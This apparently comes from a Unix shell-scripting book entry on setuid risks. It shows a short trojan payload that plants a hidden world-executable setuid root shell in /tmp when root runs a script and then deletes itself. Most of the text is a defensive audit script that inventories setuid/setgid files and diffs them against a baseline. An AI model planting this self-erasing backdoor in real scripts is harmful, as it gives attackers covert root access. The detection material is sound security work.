#49 Tracking Set User ID Applications
There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.
In a shell script, for example, a few added lines are enough to leave a setuid root shell behind for the bad guy the first time the unsuspecting root user runs the script. Every line of the payload carries a # REMOVEME marker so that, once it has fired, the last two commands strip the payload back out of the script and the only trace left is the hidden shell in /tmp. (Two practical caveats: a /tmp mounted nosuid neutralizes the planted shell, and if /bin/sh is bash it drops setuid privileges on startup unless invoked with -p, so the attacker usually copies a different shell or binary. The trick is the same either way.)

    if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
      cp /bin/sh /tmp/.rootshell # REMOVEME
      chown root /tmp/.rootshell # REMOVEME
      chmod -f 4777 /tmp/.rootshell # REMOVEME
      grep -v "# REMOVEME" $0 > /tmp/junk # REMOVEME
      mv /tmp/junk $0 # REMOVEME
    fi # REMOVEME
Once this script is run by root, a shell is surreptitiously copied ...
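The defensive side of this script is an inventory of every setuid and setgid file on the system, kept under watch so that a freshly planted /tmp/.rootshell stands out. The following is an added example written for this page, not the book's own script #49: it lists setuid/setgid files under a directory tree, flags the classic world-writable-plus-setuid combination the payload above creates, and diffs the current list against a saved baseline. It assumes only POSIX find, ls, awk, sort, diff and sed; the default baseline path /var/tmp/setuid.baseline is an assumption, not anything the book prescribes.

```shell
#!/bin/sh
# setuid_audit.sh (added example, not the book's script): inventory
# setuid/setgid files, flag dangerous ones, and diff against a baseline.

# Print the full path of every setuid or setgid regular file under $1.
# -xdev keeps the scan on one filesystem (no /proc, no network mounts).
# Paths are newline separated; names containing newlines are not handled.
list_setuid() {
    root="${1:-/}"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Read paths on stdin and print "mode owner group path" for each one via
# ls -ld, so the reviewer sees who the file runs as and who can write it.
describe_files() {
    while IFS= read -r path; do
        ls -ld "$path"
    done | awk '{ p=$9; for (i=10; i<=NF; i++) p=p" "$i; print $1, $3, $4, p }'
}

# Return 0 when an ls -l mode string shows setuid or setgid combined with
# world-writable permission (e.g. -rwsrwxrwx), the shape left behind by
# "chmod 4777 /tmp/.rootshell"; return 1 otherwise.
is_world_writable_suid() {
    mode="$1"
    case "$mode" in
        ???[sS]*|??????[sS]*) ;;   # setuid (4th char) or setgid (7th char)
        *) return 1 ;;
    esac
    case "$mode" in
        ????????w*) return 0 ;;    # 9th char: write bit for "other"
    esac
    return 1
}

# Compare the setuid/setgid list under $1 with the baseline file $2.
# First run: the baseline is created and 0 is returned. Later runs: print
# added (+) and removed (-) paths and return 1 on any change, else 0.
compare_baseline() {
    root="$1"
    baseline="$2"
    current=$(mktemp) || return 2
    list_setuid "$root" > "$current"
    if [ ! -f "$baseline" ]; then
        mv "$current" "$baseline"
        echo "baseline created: $baseline"
        return 0
    fi
    if diff "$baseline" "$current" > /dev/null; then
        rm -f "$current"
        return 0
    fi
    echo "setuid/setgid inventory changed since baseline:"
    diff "$baseline" "$current" | grep '^[<>]' | sed 's/^</-/; s/^>/+/'
    rm -f "$current"
    return 1
}

# Full report: every setuid/setgid file with its mode, a marker on the
# world-writable ones, then the baseline comparison.
main() {
    root="${1:-/}"
    baseline="${2:-/var/tmp/setuid.baseline}"   # assumed default location
    echo "setuid/setgid files under $root:"
    list_setuid "$root" | describe_files | while read -r mode owner group path; do
        flag=""
        if is_world_writable_suid "$mode"; then flag="  <-- WORLD-WRITABLE"; fi
        printf '%s %s %s %s%s\n' "$mode" "$owner" "$group" "$path" "$flag"
    done
    compare_baseline "$root" "$baseline"
}

# Scan only when asked explicitly, e.g.
#   sh setuid_audit.sh --scan / /var/tmp/setuid.baseline
# so that sourcing this file for its functions does not start a full scan.
case "${1:-}" in
    --scan) shift; main "$@" ;;
esac
```

Run it once from cron to establish the baseline, then daily; a non-zero exit means the setuid/setgid inventory changed, and the printed + lines are what to investigate first. Note that find cannot see through a filesystem mounted nosuid, so the list is a complete picture of what the kernel will honor only on filesystems where setuid is enabled.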